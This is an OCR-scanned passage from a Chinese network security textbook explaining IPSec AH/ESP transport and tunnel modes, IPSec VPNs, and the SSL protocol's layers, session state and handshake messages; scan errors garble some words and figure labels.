AH 和 ESP 都 支持 这 两 种 工作 模式 ,其 格式 在 两 种 模式 之 间 不 会 发 生变 化 。 协 议和 工 
作 模 式 结合 起 来 有 四 种 组 合 : 传输 模式 下 的 AH、 隧 道 模 式 下 的 AH、 传 输 模 式 下 的 ESP、 隧 
道 模式 下 的 ESP。 
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1. 传输 模式 


传输 模式 的 保护 对 象 是 IP 载荷 , 即 对 运行 于 IP 层 之 上 的 协议 进行 保护 ,如 TCP、UDP 
或 ICMP 等 。 在 IPv4 中 ,载荷 指 位 于 IP 包头 之 后 的 数据 。 对 于 IPv6 ,载荷 指 IP 包头 和 任 
何 存在 的 IPv6 扩展 包头 (目的 地 址 选项 除外 ) 之 后 的 数据 ,而 目的 地 址 选项 是 可 以 和 载荷 数 
据 一 起 受到 保护 的 。 

采用 传输 模式 时 , 原 IP 数据 包 的 包头 之 后 的 数据 会 发 生 改 变 , 通 过 增加 AH 或 ESP 字 
段 来 提供 安全 性 ,但 原 IP 包头 不 变 。 

只 有 在 保障 两 个 主机 的 端 到 端 安全 通信 时 , 才 使 用 传输 模式 。 原 因 很 简单 ,网 络 中 的 路 
由 器 主要 通过 检查 IP 包头 来 作出 路 由 选择 ,改变 不 了 IP 包头 之 外 的 数据 内 容 , 因 此 ,无 法 
在 路 由 的 同时 提供 安全 性 。 

以 传输 模式 工作 的 ESP 协议 可 对 IP 载荷 进行 加 密 并 可 选 地 认证 ,提供 保密 性 和 完整 
性 服务 。 而 以 传输 模式 工作 的 AH 协议 可 对 IP 载荷 和 IP 包头 的 一 部 分 选项 进行 认证 ,从 
而 可 提供 数据 完整 性 和 一 部 分 信息 源 认证 服务 。 后 Ipv4 革 包 ， 

1) AH 传输 模式 IP 头 | TCP/UDP 头 | ”数据 

AH 用 于 传输 模式 时 ,保护 的 是 端 到 端的 通信 ， AH 传输 模式 下 IPv4 封 包 ， 
通信 终点 必须 是 IPSec 终点 。AH 头 插 在 原始 的 IP [了 P 炎 | AHK[TCPUDP 关 | 歼 据 
头 之 后 ,但 在 IP 数据 包 封 装 的 上 层 协议 (如 TCP、 上 打 丰 长宁 风 外 机 认证 
UDP ICMP 等 协议 ,或 其 他 IPSec 协议 头 ) 之 前 ,如 
图 13-4 所 示 。 

2) ESP 传输 模式 

ESP 用 于 传输 模式 时 ,ESP 头 插 在 原始 的 IP 头 之 后 ,但 在 IP 数据 包 封 装 的 上 层 协 议 
(如 TCP、UDP、ICMP 等 协议 ,或 其 他 IPSec 协议 头 ) 之 前 ,如 图 13-5 所 示 。ESP 的 头 部 由 
SPI 和 序列 号 字段 组 成 ,而 ESP 尾部 由 填充 项 .填充 项 长 度 和 下 一 个 头 字 段 组 成 ,并 且 标明 
了 数据 包 被 加 密 和 认证 的 部 分 。 关 于 ESP 的 认证 服务 ,需要 强调 的 是 ,ESP 不 对 整个 IP 包 
进行 认证 ,这 一 点 与 AH 是 不 同 的 。 


图 13-4 AH 在 传输 模式 中 的 位 置 


原 IPv4 封 包 
Ip 头 | TCPUDp 头 | 数据 | 
ESP 传 输 模式 下 IPv4 封 包 : 
原 IP 头 | ESP 头 | TCP/UDP 头 | ”数据 ”| ESP 尾 部 |ESP 认 证 数据 
加 密 
= 认证 -| 


图 13-5 ESP 在 传输 模式 中 的 位 置 


2. 隧道 模式 


隧道 模式 的 保护 对 象 是 整个 IP 包 。 为 了 实现 这 一 点 , 它 将 一 个 数据 包 用 一 个 新 的 数据 
包 封 装 , 即 在 AH 或 ESP 字段 加 入 到 IP 分 组 后 ,还 要 加 上 一 个 新 的 包头 , 原 数据 包 加 上 安 
全 字段 成 为 新 数据 包 的 载荷 ,因此 得 到 了 完全 的 安全 性 保护 。 不 过 新 的 IP 包头 仍 是 未 加 保 
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护 的 。 通 常 我 们 将 原 数 据 包 的 包头 叫 内 部 包头 ,新 增加 的 包头 叫 外 部 包头 。 内 部 包头 和 外 
部 包头 的 了 了 地址 可 以 不 一 样 ,内 部 包头 由 源 主机 创建 ,而 外 部 包头 是 由 提供 安全 服务 的 那 
个 设备 添加 的 。 提 供 安 全 服务 的 设备 可 以 是 源 主机 (提供 端 到 端的 安全 服务 ), 也 可 以 是 网 
络 中 的 路 由 器 或 网 关 设备 。 

通常 ,在 数据 包 的 始 发 点 或 目的 地 不 是 安全 终点 的 情况 下 ,需要 在 隧道 模式 下 使 用 
IPSec。 如 安全 保护 能 力 需 要 有 一 个 设备 来 提供 ,而 该 设备 不 是 数据 包 的 始 发 点 (比如 在 
VPN 的 情况 下 ) ,或 者 数据 包 需 要 加 密 传送 到 与 实际 目的 地 不 同 的 另 一 个 目的 地 ,这 时 需要 
采用 隧道 模式 。 

隧道 模式 下 IPSec 还 支持 该 套 方式 , 即 可 对 已 经 隧道 化 的 数据 包 再 进行 一 次 隧道 化 处 
理 , 但 嵌 套 隧道 很 难 构 造 和 维护 。 

1) AH 隧道 模式 

在 AH 隧道 模式 中 ,AH 插 在 原 IP 头 之 前 ,并 重新 生成 一 个 新 的 IP 头 放 在 AH 之 前 ， 
如 图 13-6 所 示 。 

原 IPv4 封 包 ， 

IP 头 | TCP/UDP 头 | ”数据 
AH 传 输 模式 下 IPv4 封 包 : 
新 IP 头 | AH 头 | 原 IP 头 |TCP/UDP 头 | ”数据 
一 一 一 除 新 IP 头 变 长 字段 外 都 要 认证 


图 13-6 AH 在 隧道 模式 中 的 位 置 


2) ESP 隧道 模式 

对 于 ESP 隧道 模式 ,ESP 头 插 在 原 IP 头 之 前 ,重新 生成 一 个 新 的 IP 头 放 在 ESP 头 之 
前 ,如 图 13-7 所 示 。 

原 IPv4 封 包 : 

IP 头 | TCPUDP 头 | 数据 
ESP 传 输 模式 下 IPv4 封 包 ， 
新 [p 头 | ESP 头 | 原 Ip 头 | TCPUDP 头 | 数据 | ESP 尾 部 “|ESP 认 证 数据 
加 密 加 


[= 认证 
图 13-7 ESP 在 隧道 模式 中 的 位 置 


1324 IPSec 的 应 用 


IPSec 作为 网 络 层 安全 协议 ,实现 了 IP 数据 包 在 网 络 层 的 安全 ,提供 了 较 强 的 数据 完 
整 性 、 机 密 性 和 抗 重 放 等 安全 服务 ,能 为 上 层 协议 提供 透明 的 安全 保护 。 它 的 开放 性 与 灵活 
性 使 其 具有 广泛 的 应 用 领域 与 发 展 前 景 。 

IPSec 是 IPv6 的 基本 组 成 部 分 ,是 IPv6 必须 支持 的 功能 。IPSec 几乎 能 与 任何 类 型 的 
IP 网 络 设备 协调 工作 ,通过 采用 IPSec 和 远程 主机 防火墙. 安全 网 关 、 路 由 器 的 结合 ,可 以 
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构造 出 各 种 网 络 安全 解决 方案 , 它 能 与 其 他 协议 相 结合 提供 更 强 的 安全 性 。IPSec 能 使 企 
业 在 它们 已 有 的 IP 网 络 上 建造 一 个 安全 的 虚拟 专用 网 络 。 实 际 上 ,目前 IPSec 最 主要 的 应 
用 就 是 构建 安全 的 虚拟 专用 网 。 

虚拟 专用 网 (Virtual Private Network, VPN) 是 一 条 穿 过 公用 网 络 的 安全 ,稳定 的 隧 
道 。 通 过 对 网 络 数据 的 封包 和 加 密 传输 ,在 一 个 公用 网 络 (通常 是 因特网 ) 建 立 一 个 临时 的 、 
安全 的 连接 ,从 而 实现 在 公 网 上 传输 私有 数据 ,达到 私有 网 络 的 安全 级 别 。 通 常 ,VPN 是 对 
企业 内 部 网 的 扩展 ,通过 它 可 以 帮助 远程 用 户 、 企 业 分 支 机 构 、 商 业 伙 伴 及 供应 商 同 企业 的 
内 部 网 建立 可 信和 的 安全 连接 ,并 保证 数据 的 安全 传输 。VPN 可 用 于 不 断 增长 的 移动 用 户 的 
全 球 因特网 接 入 ,以 实现 安全 连接 ; 可 用 于 实现 企业 网 站 之 间 安 全 通信 的 虚拟 专用 线路 ,经 
济 有 效 地 连接 到 商业 伙伴 和 用 户 。 

利用 IPSec 实现 的 VPN 是 面向 各 局 域 网 通过 公 网 互联 应 用 的 。 具 体 的 实现 方式 是 在 
各 局 域 网 的 网 关 / 边 界 路 由 器 位 置 放置 支持 IPSec 隧道 功能 的 安全 网 关 , 作 为 各 个 局 域 网 的 
代理 ,各 个 安全 网 关 之 间 通过 IPSec 隧道 互联 。 

对 于 隧道 连接 的 起 止 点 位 置 的 选择 ,大 致 有 两 种 方式 。 一 是 隧道 连接 终止 在 安全 网 关 
处 ,此 时 IPSec 的 协议 操作 全 部 由 安全 网 关 代理 完成 ,整个 VPN 便于 实现 统一 的 管理 和 控 
制 ,用 户 端 的 处 理 负担 较 小 ,但 必须 对 安全 网 关 充 分 信任 , 且 用 户 信息 在 局 域 网 内 部 以 明文 
方式 送出 ,对 内 网 发 起 的 攻击 无 抵抗 力 。 二 是 隧道 终止 在 端 用 户 处 ,此 时 用 户 需 要 自己 完成 
IPSec 的 安全 设置 ,一 般 需要 安装 支持 IPSec 的 客户 端 程序 ,配置 比较 复杂 ,但 可 对 用 户 数据 
提供 端 到 端的 全 程 保护 。 

一 个 典型 的 基于 IPSec 隧道 的 VPN 如 图 13-8 所 示 。 


125.1.2.3 


EE -站 2 
可 Internet 口 ] 
x 总 ， 


194.4.5.6 


图 13-8 基于 IPSec 的 VPN 


部 门 A 的 主机 X 生 成 一 个 全 包 , 目 的 地 址 是 部 门 B 中 的 主机 Y。 中 间 要 穿 过 不 安全 
的 Internet。 这 个 包 从 起 始 主机 被 发 送 到 部 门 A 的 网 络 边缘 的 安全 路 由 器 (IPSec 网 关 ) 。 
安全 路 由 器 把 所 有 出 去 的 包 过 滤 ,看 看 有 哪些 包 需 要 进行 IPSec 的 处 理 。 如 果 这 个 从 X 到 
Y 的 包 需 要 使 用 IPSec, 安 全 路 由 器 就 进行 IPSec 的 处 理 , 并 添加 外 层 IP 包头 。 

这 个 外 层 包头 的 源 地 址 是 部 门 A 的 安全 路 由 器 ,而 目的 地 址 是 部 门 B 的 网 络 边缘 的 安 
全 路 由 器 。 中 途 的 路 由 器 只 检查 外 层 的 了 包头 。 部 门 B 的 网 络 的 安全 路 由 器 接收 后 ,会 把 
外 层 IP 包头 除 掉 , 按 IP 内 层 的 目的 地 址 发 送 到 主机 Y。 

IPSec 为 通过 公共 网 络 传输 敏感 信息 提供 了 必须 的 机 密 性 完整 性 和 认证 能 力 ,并 具有 
防 重 放 等 抗 攻 击 能 力 。VPN 产品 能 够 让 客户 透明 地 在 网 络 基 础 设施 中 实施 IPSec, 而 不 影 
响 原 网 络 拓扑 结构 以 及 其 他 工作 站 和 PC 的 工作 。 

目前 在 市 场 上 有 很 多 VPN 产品 ,支持 各 种 安全 协议 (如 PPTP、L2TP、IPSec、SSL), 尤 
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其 以 IPSec 协议 为 基础 的 VPN 产品 应 用 成 熟 和 广泛 ,其 中 不 乏 国 内 产品 。 对 于 以 IPSec 技 
术 实 现 的 VPN 产品 ,应 该 具备 下 列 功 能 。 

其 一 ,IPSec 在 一 个 私有 网 络 中 的 两 个 参与 实体 之 间 提 供 数据 机 密 性 、 完 整 性 和 认证 ， 
VPN 产品 要 支持 ESP 和 AH 格式 。 

其 二 ,IKE 提供 与 安全 相关 的 管理 。IKE 鉴别 IPSec 通信 事务 中 的 每 个 对 等 实体 ,协商 
安全 策略 并 处 理会 话 密 钥 的 交换 。 

其 三 ,证 书 管理 。VPN 产品 要 支持 用 于 设备 认证 的 X. 509 v3 的 证 书 系统 。 

尽管 目前 对 于 SSL VPN 的 应 用 正在 逐步 推广 中 ,但 IPSec VPN 无 疑 依然 是 目前 VPN 
市 场 上 的 主要 占据 者 。 


133 ”SSL 协议 


SSL 协议 是 一 种 国际 标准 的 加 密 及 身份 认证 通信 协议 ,最 初 是 为 互联 网 上 保密 文档 传 
送 而 研究 开发 的 ,后 来 成 为 了 Internet 网 上 安全 通信 与 交易 的 标准 。SSL 协议 是 一 个 传输 
层 安全 协议 。 


133.1 SSL 协 议 概 述 


SSL 协议 由 Netscape 公司 于 1994 年 11 月 提出 并 率先 实现 , 即 SSL v2. 0 Internet-Draft 
版 本 ,随后 该 版 本 经 历 了 5 次 修改 。1996 年 3 月 ,在 对 SSL v2. 0 进行 重大 改进 的 基础 上 ， 
推出 了 SSL v3. 0 Internet-Draft 版 本 。 它 不 仅 解决 了 SSL v2. 0 中 存在 的 许多 问题 ,改进 了 
它 的 许多 局 限 性 ,并 且 支 持 更 多 的 加 密 算法 ,最 终 被 IETF 所 采纳 ,并 制定 为 传输 层 安全 
(Transport Layer Security,TLS) 标 准 。 该 标准 刚 开 始 制定 时 是 面向 Web 应 用 的 安全 解决 
方案 , 随 着 SSL 部 署 的 简易 性 和 较 高 的 安全 性 逐渐 为 人 所 知 , 现 在 它 已 经 成 为 Web 上 部 署 
最 为 广泛 的 安全 协议 之 一 。 近 年 来 SSL 的 应 用 领域 不 断 被 拓宽 ,许多 在 网 络 上 传输 的 敏感 
信息 (如 电子 商务 ,金融 业务 中 的 信用 卡号 或 PIN 码 等 机 密 信息 ) 都 纷纷 采用 SSL 来 进行 安 
全 保护 。SSL 通过 加 密 传输 来 确保 数据 的 机 密 性 ,通过 消息 认证 码 来 保护 信息 的 完整 性 ， 
通过 数字 证 书 来 对 发 送 和 接收 者 的 身份 进行 认证 。 

SSL 协议 涉及 所 有 TCP/IP 应 用 程序 。 该 协议 工作 在 传输 层 之 上 ,应 用 层 之 下 ,其 底层 
是 基于 传输 层 可 靠 的 流传 输 协议 (如 TCP) ,如 图 13-9 所 示 。 


HTTP Telnet SMTP FIP 


图 13-9 SSL 协议 在 网 络 层次 中 的 位 置 


SSL 协议 使 用 通信 双方 的 客户 证 书 以 及 CA 根 证 书 ,允许 客户 机 /服务 器 以 一 种 不 能 被 
偷 听 的 方式 通信 ,在 通信 双方 间 建 立 起 了 一 条 安全 的 、 可 信任 的 通信 通道 。 该 协议 使 用 密 钥 
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对 传送 数据 加 密 , 许 多 网 站 都 是 通过 这 种 协议 从 客户 端 接收 信用 卡 编号 等 保密 信息 。 它 被 
认为 是 最 安全 的 在 线 交 易 模 式 , 目 前 在 电子 商务 领域 应 用 很 广 , 并 被 许多 世界 知名 厂商 的 
Intranet 和 Internet 网 络 产品 所 支持 ,其 中 包括 Netscape、Microsoft、IBM、Open Market 等 
公司 提供 的 支持 SSL 协议 的 客户 机 和 服务 器 产品 ,如 IE 和 Netscape 浏览 器 ,IIS、Domino 
Go Web Server、Netscape Enterprise Server 和 Apache 等 Web 服务 器 。 

SSL 安全 协议 主要 提供 三 方面 的 服务 。 

(1) 客户 机 和 服务 器 的 合法 性 认证 。 认 证 客户 和 服务 器 的 合法 性 ,使 得 它们 能 够 确信 
数据 将 被 发 送 到 正确 的 客户 机 和 服务 器 上 。 客 户 机 和 服务 器 都 有 各 自 的 识别 号 ,这 些 识 别 
号 由 公 钥 进行 编号 ,为 了 验证 客户 是 否 合法 ,SSL 要 求 在 握手 交换 数据 时 进行 数字 认证 ,以 
此 来 确保 客户 的 合法 性 。 

(2) 加 密 数 据 以 隐藏 被 传送 的 数据 。SSL 所 采用 的 加 密 技术 既 有 对 称 密 钥 技 术 , 也 有 
公 钥 技术 。 在 客户 机 与 服务 器 进行 数据 交换 之 前 ,交换 SSL 初始 握手 信息 ,在 SSL 握手 信 
息 中 采用 了 各 种 加 密 技术 对 其 加 密 , 以 保证 其 机 密 性 和 完整 性 ,并 且 用 数字 证 书 进行 认证 ， 
这 样 就 可 以 防止 非法 客户 进行 破译 。 

(3) 保护 数据 的 完整 性 。SSL 采用 Hash 函数 和 机 密 共享 的 方法 来 提供 信息 的 完整 性 
服务 ,建立 客户 机 与 服务 器 之 间 的 安全 通道 ,使 所 有 经 过 SSL 处 理 的 业务 在 传输 过 程 中 能 
全 部 完整 准确 无 误 地 到 达 目 的 地 。 

SSL 协议 的 优点 在 于 它 是 与 应 用 层 协议 无 关 的。 高 层 的 应 用 协议 (如 HTTP、FTP、 
Telnet 等 ) 能 透明 地 建立 于 SSL 协议 之 上 。SSL 协议 在 应 用 层 协议 之 前 就 已 经 完成 加 密 算 
法 .通信 密 钥 的 协商 以 及 服务 器 的 认证 工作 。 在 此 之 后 应 用 层 协议 所 传送 的 数据 都 会 被 加 
密 , 从 而 保证 通信 的 安全 性 。 

SSL 对 通信 过 程 进行 安全 保护 ,其 实现 过 程 主要 经 过 如 下 几 个 阶段 。 

(1) 接 通 阶段 : 客户 机 通过 网 络 向 服务 器 打招呼 ,服务 器 回应 。 

(2) 密码 交换 阶段 : 客户 机 与 服务 器 之 间 交 换 双 方 认可 的 密码 ,一般 选用 RSA 密码 算 
法 ,也 有 的 选用 Diffie-Hellman 和 Fortezza-KEA 密码 算法 。 

(3) 会 话 密码 阶段 : 客户 机 与 服务 器 间 产 生 彼此 交谈 的 会 话 密码 。 

(4) 检验 阶段 : 客户 机 检验 服务 器 取得 的 密码 。 

(5) 客户 认证 阶段 : 服务 器 验证 客户 机 的 可 信和 度 。 

(6) 结束 阶段 : 客户 机 与 服务 器 之 间 相 互 交换 结束 的 信息 。 

当 上 述 动作 完成 之 后 ,两 者 间 的 资料 传送 就 会 加 密 , 男 外 一 方 收 到 资料 后 ,再 将 加 密 资 
料 还 原 。 即 使 盗窃 者 在 网 络 上 取得 加 密 后 的 资料 ,如 果 没 有 原先 编制 的 密码 算法 和 密码 ,也 
不 能 获得 可 读 的 有 用 资料 。 

发 送 时 信息 用 对 称 密 钥 加 密 ,对 称 密 钥 用 非 对 称 算法 加 密 , 再 把 两 个 包 绑 在 一 起 传送 过 
去 。 接 收 的 过 程 与 发 送 正好 相反 , 先 打开 有 对 称 密 钥 的 加 密 包 ,再 用 非 对 称 密 钥 解密 。 


1332 SSL 协 议 的 分 层 结构 


SSL 的 设计 概念 是 希望 使 用 TCP 来 提供 一 个 可 靠 的 端 对 端的 安全 服务 。SSL 并 不 是 
单一 的 协议 ,而 是 由 二 层 协议 来 组 成 。 
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SSL 协议 具有 两 层 结 构 , 其 底层 是 SSL 记录 协议 层 (SSL Record Protocol Layer) ,简称 
记录 层 。 其 高 层 是 SSL 握手 协议 层 (SSL Handshake Protocol Layer) ,简称 握手 层 , 如 
图 13-10 所 示 。 


| 应 用 层 协议 (HTTP 、Telnet、FTP、SMTP 等 ) 


SSL 协 议 
SSL 记 录 协 议 (Record Protocol) 


| TCP 协 议 


SSL 担 手 协议 (Handshake Protocol) | 


| IP 协 议 
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握手 层 允 许 通 信 实 体 在 应 用 SSL 协议 传送 数据 之 前 相互 认证 身份 ,协商 加 密 算法 、. 生 
成 密 钥 等 。 记 录 层 则 封装 各 种 高 层 协议 ,具体 实施 压缩 与 解压 缩 、 加 密 与 解密 、 计 算 与 验证 
消息 认证 码 (MAC) 等 与 安全 有 关 的 操作 。 

SSL 协议 定义 了 两 个 通信 主体 : 客户 机 (Client) 和 服务 器 (Server)。 其 中 ,客户 是 协议 
的 发 起 者 。 在 SSL 协议 中 定义 的 客户 和 服务 器 与 通常 讲 的 客户 机 /服务 器 (C/S) 结 构 中 的 
客户 和 服务 器 的 含义 不 同 。 在 客户 机 /服务 器 结构 中 ,应 用 层 从 请 求 服务 和 提供 服务 的 角度 
定义 客户 和 服务 器 ,而 SSL 协议 则 从 建立 加 密 参 数 的 过 程 中 所 扮演 的 角色 来 定义 客户 和 服 
务 器 。 当 SSL 协议 与 客户 机 /服务 器 结构 结合 使 用 时 ,客户 机 /服务 器 结构 中 的 客户 应 用 其 
下 方 的 SSL 协议 ,以 SSL 协议 的 客户 身份 运行 ; 客户 机 /服务 器 结构 中 的 服务 器 应 用 其 下 
方 的 SSL 协议 ,以 SSL 协议 的 服务 器 身份 来 运行 。 

SSL 两 个 最 重要 的 概念 是 SSL session 与 SSL connection。 它 们 分 别 被 定义 如 下 。 

(1) Connection (连接 ): 一 个 在 传输 层 协议 上 的 传输 媒介 (在 OSI 分 层 模型 的 定义 
中 )。 它 提供 一 个 适当 的 服务 。 在 SSL 中 ,这 些 连接 就 是 Peer-to-Peer 间 的 关系 ,而 且 是 短 
暂 的 。 连 接 建 立 在 会 话 的 基础 上 ,每 个 连接 与 一 个 会 话 相关 联 , 并 对 应 到 一 个 会 话 。 

(2) Session (会 话 ) : SSL 会 话 建立 客户 与 服务 器 之 间 的 一 个 关联 (Association) 。 每 一 
组 客户 端 与 服务 器 之 间 就 是 一 个 SSL session。SSL session 是 由 Handshake 协议 来 产生 。 
这 些 会 话 定义 一 组 以 密码 为 基础 的 安全 性 参数 ,这 些 参数 能 够 由 多 个 连接 来 共同 使 用 。 也 
就 是 说 ,使 用 会 话 能 够 避免 每 次 有 新 的 连接 时 ,都 得 重新 协调 安全 性 参数 的 过 程 ,从 而 大 大 


减少 开销 。 
连接 与 会 话 之 间 的 关系 如 图 13-11 所 示 ,在 任意 一 对 通信 主体 之 间 , 可 以 有 多 个 安全 连接 。 
连接 1 连接 1 
连接 ? 会 话 连接 ? 
连接 n 连接 n 


13-11 SSL 的 会 话 与 连接 
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任何 一 对 正在 互动 的 应 用 程序 中 (如 客户 端 与 服务 器 上 的 HTTP 应 用 程序 ) ,其 间 可 能 
包含 一 条 以 上 的 安全 性 连接 。 理 论 上 ,它们 之 间 也 可 以 同时 拥有 多 个 会 话 , 但 是 这 个 情况 在 
实际 应 用 上 使 用 比较 少 。 

每 一 个 会 话 都 会 有 几 种 状态 (State) 。 当 会 话 刚 建 立时 ,其 运作 状态 属于 读 取 (read) 及 
写 人 (write)( 也 就 是 接收 以 及 传送 ) 。 除 此 之 外 , 当 Handshake 协议 正在 进行 时 ,会 发 生 即 
将 读 取 (pending read) 以 及 即将 写 人 (pending write) 状 态 。 一 旦 Handshake 协议 执行 成 功 
后 ,这 些 pending state 便 会 取代 成 为 目前 的 状态 。 

每 一 个 会 话 的 状态 包含 以 下 参数 ( 取 自 SSL 规格 书 中 的 定义 ) 。 

(1) Session identifier( 会 话 标识 符 ): 由 服务 器 所 选 定 的 任意 字 节 序列 。 会 话 标识 符 能 
够 用 来 辨别 某 一 个 正在 进行 (active) 的 会 话 状态 或 者 是 可 恢复 (resumable) 的 会 话 状态 。 

(2) Peer certificate( 对 方 认 证 ): 客户 和 服务 器 的 X509. v3 格式 证 书 。 这 个 参数 可 以 
为 null, 视 是 否 验 证 服务 器 或 客户 而 定 。 

(3) Compression method( 压 缩 算法 ): 用 于 加 密 前 对 数据 进行 压缩 。 

(4) Cipher spec( 密 码 规格 ) : 指 握手 协议 协商 的 一 套 加 密 参 数 ,包括 数据 加 密 算法 以 及 
计算 消息 认证 码 C(MAC) 所 使 用 的 杂凑 算法 (如 MD5 或 SHA-1) 。 

(5) Master secret( 主 密 钥 ) : 由 客户 端 与 服务 器 所 共有 的 密 钥 ,长 度 为 48 字 节 。 

(6) Is resumable: 一 个 标识 ,说 明 一 个 会 话 是 否 可 恢复 , 即 这 个 session 是 否 能 在 将 来 
被 用 来 建立 新 的 连接 。 

每 一 个 连接 的 状态 包含 以 下 参数 。 

(1) Server and client random: 每 一 次 进行 连接 时 ,由 服务 器 与 客户 端 随机 选 定 的 字 节 
序列 。 

(2) Server write MAC secret: 服务 器 用 来 参与 计算 消息 认证 码 的 密 钥 。 当 有 数据 要 
从 服务 器 端 送出 时 ,服务 器 会 利用 该 参数 算出 MAC ,数据 一 并 送出 。 它 是 客户 的 read 
MAC secret。 

(3) Client write MAC secret: 客户 端 用 来 计算 消息 认证 码 的 密 钥 。 当 有 数据 要 从 客户 
端 送出 时 ,客户 端 会 利用 该 参数 算出 MAC ,与 数据 一 并 送出 。 它 是 服务 器 的 read MAC 
Secret 。 

(4) Server write key: 服务 器 用 于 加 密 数据 .客户 用 于 解密 数据 的 对 称 加 密 密 钥 。 

(5) Client write key: 客户 用 于 加 密 数据 、 服 务 器 用 于 解密 数据 的 对 称 加 密 密 钥 。 

(6) Initialization vector( 初 始 向 量 ): 我 们 使 用 DES 的 CBC 模式 来 做 区 块 加 密 时 , 需 
要 为 每 支 密 钥 产生 一 个 初始 向 量 (IV) 来 当做 第 一 个 区 块 的 输入 。 这 个 字段 首先 会 由 
Handshake 协议 来 初始 化 其 值 。 

(7) Sequence number: 序列 号 ,每 一 次 连接 时 ,每 一 方 都 要 为 其 传送 的 消息 以 及 接收 的 
消息 准备 不 同 的 序列 号 。 当 有 一 方 送出 或 者 是 收 到 change cipher spec 消息 时 ,就 会 将 相应 
方向 上 的 序列 号 设 定 为 0。 

SSL 协议 使 用 两 个 相互 独立 的 128 位 的 密 钥 , 即 server write key 和 client write key， 
分 别 用 于 同一 连接 的 两 个 方向 上 的 加 解密 。 同 样 ,也 使 用 两 个 相互 独立 的 128 位 MAC 密 
钥 , 即 Server write MAC secret 和 Client write MAC secret ,分 别 用 于 同一 连接 的 两 个 方向 
上 的 MAC 操作 。 
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Handshake 协议 为 SSL 中 最 复杂 的 一 部 分 。 这 个 协议 主要 是 用 来 让 客户 端 及 服务 器 
确认 彼此 的 身份 。 除 此 之 外 ,为 了 保护 SSL 记录 封包 中 传送 的 数据 , Handshake 协议 还 能 
协助 双方 选择 连接 时 所 使 用 的 加 密 算法 、MAC 算法 及 相关 密 钥 。 在 传送 应 用 程序 的 数据 
前 ,必须 使 用 Handshake 协议 来 完成 上 述 事项 。 

Handshake 由 一 些 客 户 与 服务 器 交换 的 消息 所 构成 ,每 一 个 消息 都 含有 以 下 三 个 
字段 。 
(1) 类 型 (Type) ,1 个 字 节 : 表示 消息 的 类 型 ,总 共有 十 种 。 在 表 13-1 中 列 出 了 这 些 已 
经 定义 的 消息 种 类 。 

(2) 长 度 (Length) ,3 个 字 节 : 消息 的 位 组 长 度 。 

(3) 内 容 (Content) ,大 于 或 等 于 1 个 字 节 ,与 此 消息 有 关 的 参数 , 表 13-1 列 出 所 有 可 能 
的 参数 。 


表 13-1 SSL Handshake 协议 消息 类 型 


消息 种 类 参数 
hello_request Nnull 
client_hello Version, random, session id,cipher suite, compression method 
server_hello Version, random, session id, cipher suite, compression method 
certificate 一 连 串 的 X. 509 v3 的 证 书 
server_key_exchange Parameters, signature 
certificate_request Type,authorities 
server_done Null 
certificate_verify Signature 
client_key_exchange Parameters, signature 
finished Hash value 


图 13-12 说 明 客户 端 与 服务 器 要 产生 一 条 新 连接 时 ,所 要 进行 的 初始 交换 过 程 。 这 个 
交换 过 程 可 以 视 为 四 个 阶段 , 即 建立 安全 能 力 、 服 务 器 认证 与 密 钥 交 换 、 客 户 端 认 证 与 密 钥 
交换 完成 。 


1. 建立 安全 能 力 


这 个 阶段 的 主要 工作 是 要 建立 一 条 逻辑 连接 ,以 及 与 这 个 连接 有 关 的 安全 功能 。 整 个 
交换 过 程 由 客户 端 送出 一 个 client_hello 消息 来 开启 ,这 个 消息 含有 下 面 几 个 参数 。 

(1) Version( 版 本 ) : 客户 端 能 够 用 的 SSL 最 高 版 本 。 

(2) Random( 随 机 值 ) : 一 个 由 客户 端 产生 的 随机 结构 ,包含 一 个 32 位 长 的 时 间 戳 ,以 
及 一 个 由 随机 数 产生 器 所 产生 的 28 字 节 长 的 数字 。 

(3) Session ID( 会 话 标识 符 ): 不 定 长 度 的 session 识别 码 。 如 果 Session ID 字段 填 上 
任何 非 零 的 数值 ,就 表示 客户 端 想 继续 使 用 上 一 个 SSL 连接 ,并 且 更 新 此 连接 的 参数 ,或 者 
在 目前 的 session 产生 一 个 新 的 连接 。 如 果 此 字段 的 值 为 零 . 则 表示 客户 端 希 望 重新 建立 一 
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Client Server 
Client_hello 
建立 安全 能 力 

Server hello 
到 certificate 
2 
三 a 
| Server key_exchang 服务 器 认证 与 

quest 密 钥 交换 


Certificate 


Server_hello_done 


certificate 
Client_key exchange 2 tS 所 
与 密 钥 交 
Certificate ver; fy 
Change cipher spe 本 
finished 


Cha nge_cipher_SPeS 
finished 


图 13-12 客户 端 与 服务 器 的 初始 交换 过 程 


个 新 的 session, 并 且 产 生 一 个 新 的 连接 。 

(4) CipherSuit( 密 码 套件 ) : 客户 端 能 够 支持 的 加 密 算法 列表 ,这 个 列表 会 根据 使 用 优 
先 级 由 大 到 小 排列 。 在 这 列表 上 的 每 一 个 密码 套件 都 会 定义 其 使 用 的 密 钥 交 换算 法 以 及 加 
密 算法 。 

(5) Compression Methods( 压 缩 算法 ): 客户 端 能 够 支持 的 压缩 算法 列表 。 

当 客 户 端 送出 client_hello 消息 后 ,会 等 待 服务 器 响应 一 个 server_hello 消息 。 这 个 消 
息 所 包含 的 参数 与 client_hello 消息 夹带 的 参数 相同 。 对 于 server_hello 消息 来 说 ,每 个 字 
段 用 法 如 下 。 

(1) Version: 服务 器 允许 客户 端 使 用 的 SSL 版 本 。 这 个 版 本 为 客户 端 以 及 服务 器 双 
方 都 能 支持 的 最 高 版 本 。 

(2) Random: 由 服务 器 所 产生 的 随机 结构 。 与 客户 端 所 产生 的 随机 结构 类 似 , 但 彼此 
独立 。 

(3) Session ID: 假如 客户 端 传送 过 来 的 Session ID 字段 为 非 零 的 数值 ,那么 服务 器 会 
将 这 个 字段 的 值 设 定 成 客户 端 所 指定 的 Session ID。 否 则 服务 器 将 会 提供 客户 端 新 的 会 
话 ,并 为 此 字段 填 上 代表 这 个 新 会 话 的 标识 符 。 

(4) CipherSuit: 服务 器 从 客户 端 所 提供 的 密码 套件 列表 中 挑 出 的 加 密 算 法 组 合 。 

(5) Compression Method: 服务 器 从 客户 端 所 提供 的 压缩 方法 列表 中 挑 出 的 方法 。 

密码 套件 参数 所 包含 的 第 一 个 元 素 为 密 钥 交 换 的 算法 (传统 加 密 以 及 计算 消息 认证 码 
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时 所 会 用 到 的 密 钥 的 交换 方式 )。 有 以 下 几 种 提供 的 密 钥 交换 算法 。 

(1) RSA: 由 接收 端的 公开 密 钥 来 将 密 钥 加 密 起 来 。 为 了 事先 得 知 接收 端的 公开 密 
钥 , 其 公开 密 钥 的 证 书 必须 要 能 让 发 送 端 取得 。 

